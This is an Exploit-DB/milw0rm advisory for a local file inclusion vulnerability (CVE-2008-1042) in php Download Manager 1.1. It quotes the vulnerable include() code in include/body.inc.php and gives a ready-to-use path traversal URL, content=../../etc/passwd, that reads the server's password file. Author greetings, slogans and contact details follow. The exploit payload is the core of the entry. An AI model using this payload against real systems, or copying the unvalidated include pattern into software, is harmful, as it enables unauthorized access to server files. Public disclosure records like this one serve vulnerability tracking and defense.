php Download Manager <= 1.1 - Local File Inclusion Vulnerability

2008-02-24T00:00:00
ID EDB-ID:5183
Type exploitdb
Reporter BeyazKurt
Modified 2008-02-24T00:00:00

Description

php Download Manager <= 1.1 Local File Inclusion Vulnerability. CVE-2008-1042. Webapps exploit for php platform

                                        
                                            #####################################################
# Author : BeyazKurt
# Contact : Bey4zKurt@Gmail.Com
#
# Script : php Download Manager (v1.1 & 1.0)
# Risk : Local File Include
# Download : http://sourceforge.net/project/showfiles.php?group_id=185482
#
# File : include/body.inc.php
#
# Code :
#   &lt;?php
#      if (file_exists($content)) {
#      include($content);
#      } else { echo "&lt;p&gt;This page has no content.&lt;/p&gt;"; }
#   ?&gt;
#
# Exploit :
#
#  Vuln.Com/include/body.inc.php?content=../../etc/passwd
#
#----------------------------
#
#                          INDEPENDENT KOSOVA (H)
#  ARNAVUT Olmak Ayrıcalıktır - Being An ALBANIAN Is A Priviledge
#            
#                      15 Sehidimizin ruhu saad olsun...
#
#                            Www.Netkabus.Com
#
#  Not : I Love You Gulsum (F)
#  Thnx : Ekin0x - Fotosopar seni :D
#####################################################

# milw0rm.com [2008-02-24]